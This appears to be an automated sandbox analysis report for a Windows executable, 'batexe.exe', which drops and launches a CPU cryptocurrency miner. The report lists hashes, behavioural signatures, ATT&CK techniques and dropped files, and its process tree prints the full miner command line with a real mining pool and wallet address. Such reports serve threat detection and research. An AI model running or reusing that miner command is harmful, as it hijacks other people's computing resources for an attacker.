73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 09:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2380	b2e.exe
2984	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2984	cpuminer-sse2.exe
2984	cpuminer-sse2.exe
2984	cpuminer-sse2.exe
2984	cpuminer-sse2.exe
2984	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2956-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 2380	2956	batexe.exe	85
PID 2956 wrote to memory of 2380	2956	batexe.exe	85
PID 2956 wrote to memory of 2380	2956	batexe.exe	85
PID 2380 wrote to memory of 1340	2380	b2e.exe	86
PID 2380 wrote to memory of 1340	2380	b2e.exe	86
PID 2380 wrote to memory of 1340	2380	b2e.exe	86
PID 1340 wrote to memory of 2984	1340	cmd.exe	89
PID 1340 wrote to memory of 2984	1340	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76D6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
3.7MB

MD5
98c94a10a1d2a07dabf90dac05ee6367

SHA1
7299e9ca8ae4b8c53224685c8703ff409baec79d

SHA256
447f38006eb1e5482e1041d08e6501c1b83afaac339a35b481207697ba5aa4fc

SHA512
8bd7a215ebaf52de1d96b64d2051405ef62493324e8a487ecb6f07603fcb4b97fe9bb8ea29a1864e60cdfb782b9d3417f0fbeeaad24afd333f2ddeb48e402a62

Download Submit
C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
2.0MB

MD5
a54a32246a93ee75877805c1d1c617b1

SHA1
6a6c4fb49c5e921c246545624dc08ed11c552e51

SHA256
5206480adf83837196d94b3ddd4ae8d9cf79f80dab608f782f194bd52011789d

SHA512
c89628d59cf66cdc96bb9919dc2a57f9dd8ec33a18f4d0f9e7290d44cd2a97a1c29028698c81089b5fb4c185ef2504bdbf72d4800cb98cbe4c73f6741443f82c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
1.8MB

MD5
4f58bd4e077473ec01a97c40b3cbaf56

SHA1
eb0e2a29f88f40875e65a41f1ade5c2f69b46e3c

SHA256
02969a9b4c43f8365ff799e5928c63210e16794982134e98e7976fd16da08381

SHA512
8550a91e3d22d0a75da3f7fff0ab28664946e273d02dd82903fb706944161e8a7e18be84379a955502296e55b8d2ccb3b1ec3c5879794445c497df7ac7954734

Download Submit
C:\Users\Admin\AppData\Local\Temp\76D6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
499KB

MD5
e3968232ca382a72477edb9d40bd8689

SHA1
5e8cdb650c48b827dd9b2eff3c98970cab9178ba

SHA256
b06cfb9d7319e334fd04394324140830c188086564e59f839458bda89865e7c0

SHA512
b215bb0e23dc52aea48ce79140834e5cbaa19700a55e8d5a1355eed4c1b211a93b4e2dc53ec8e1a444256fa22c40016150a9eea9fd1258b82338ca3c074d0823

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
506KB

MD5
a66cf86ab052275c3be0add3ec261df8

SHA1
504ce09e4931ccf82a6a542266789989334b838c

SHA256
908e4648b41c756e5196fe079dff7004335c4e7d0bbf335a94750d172f0ad7c6

SHA512
5f782acfa9f0321591a30f9fcbf8db7da64c72daf54306c36080915607379d07aca8deb13fd71c5ed1cf9171b6bdc875fb506fbb1974cf3c40b98702061744f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
582KB

MD5
2c63ddb2b64f680e647e7401c3f91403

SHA1
a80aab8e206e37b6e7cfe35c51f17baa8498c805

SHA256
b0ed6557206f02cc33b04a9956f9f4f2dc09545b81ceff1ac25f965a5dd48019

SHA512
6aa8cbaeb57881e3adb30f1cd9b6e3b693909a0a515186ffb41a75869747b157c2690dd2603e91b80e1f16aea1edcf58eafe0c98d3dd4974dcc756f641dae32c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
343KB

MD5
0dc615a963ae105a1c3ef1ce3008de1f

SHA1
1c28612de8645b3c2cbf0643f89ada5a3559ba73

SHA256
34850e4f088225ef077c826bf2b0f1a1dfebd196b561523976e1cc4db7418800

SHA512
d7c582ed3c878df0fcb0415b9a563bb085167cde34f6066ad8e2345c5be6877fb33f7766e47ba88e8bb0d389e3207c2a15fd2125fb2f74142494f60e7cf4054a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
544KB

MD5
6ca0ef8c25d93fa40e79fbffba9d68e5

SHA1
16898cca3ead9901a1f346a57c1ea3409db1cd91

SHA256
c3114336298d43d82badaed3b14a781906bad4f464807d1d648c42422712a338

SHA512
c07de4964e51c2050b0e8852939352561dccd14185b979500e5ee2d6a66520843fab4c22498314eaef4a4f04daad394dd80eb1b269f8dceb81b212b96a7459b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
507KB

MD5
3ca678652fdd269d78eeb89d489bdfe8

SHA1
ab1c42cf22c5ef26329bd6700b0c3a23396dcfee

SHA256
46d26efa0fe1ac14743556d7610716ba2a421a18910a80d2c690b20d95b86426

SHA512
206a7929da967d3d0e78f68d3316bbc6c87d8162d93952a2baa2530bcb29477808fbb4c59b101794c63f2f6cd85b318fbe0a6863858f0d8b9a322ad78a18ee62

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
464KB

MD5
74cf4c3797ac2a7b7a23bfe85e5e62fd

SHA1
23b55502f4119d671a2fcc0a60e467c404be0b69

SHA256
0abe7b0ca19ce382fc63bab932c258daf1377182d4da03db921afe109a6a444e

SHA512
cd649c3b7b6538ee105013069f65fdfdd606c88ac0a1eeb6f89fdd01311dcda6d8fe665a5fbff52bbce3dc8a670c3701687d63214c9d062f7a9e57d0fdf6b393

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
414KB

MD5
fc128ad8b28b37e5c4600be775a5b3a1

SHA1
2b0fa651546ccc4d54a7eecd25a44fad94756613

SHA256
d6245aad9f8300364d249aa5e74dd1f3bbfbcad6cdbaea9e4498e4e75dc24cc1

SHA512
b13cb8387145371b3a5b96513a32ed14524e1a84983ca67fc8380dc017473fe6a58e8b2b034ee556cf7f6e4878ca8c6e505f84337add9dedccdd7e1fcabe20ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
704KB

MD5
41c578ef2c75de753ab5971242bc3c74

SHA1
10d4884bb666ebc9e927aa417d855ab3a4af51a7

SHA256
890f7a806f30bcea5e8f312c1555cda2b0783569ef04fdcee39d33971f68f8fa

SHA512
f3d29c82d16b0719cef36e45b5fbf92b3fbf2268503b94e7c925d9a41980766b422aadf6d2e47bc7824df998c4518912856749519cd97460d4117e80567b059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
469KB

MD5
435a901f55b3db462f83b60f47f575e5

SHA1
942554a98776c5d9953963230730d74069207524

SHA256
7ef6bf3572aefcc61711f7e331033ef78e25abe9fa120bd93adc53d04a5d13c5

SHA512
b2b21fa49d372b054cd54fbe8ac4321bd1f52ace20b539146b7f7a64c5d44d050bfd59373c696abf19f04b5d42eb06f93bc38d23f2b238df7181bffabefe4381

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
407KB

MD5
9dcf76a37b001cb1e29ee93763462e0b

SHA1
aad5fa1dc115d516a02720b8f7a97f97ba8e7da9

SHA256
35075796eb2c73a98af568fa4596d7edc1840d5505712ec24d1805eebc625787

SHA512
9a2ddd85982a538d2b7c83461b65483b924d807447f1e497463f505fd979cd4d89dce933388e004358c3cbb93f035f80493cff858b761568fe982073bc8f8c5f

Download Submit
memory/2380-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2380-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2956-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2984-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2984-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-46-0x000000005BE40000-0x000000005BED8000-memory.dmp

Filesize
608KB

Download
memory/2984-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2984-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2984-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2984-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download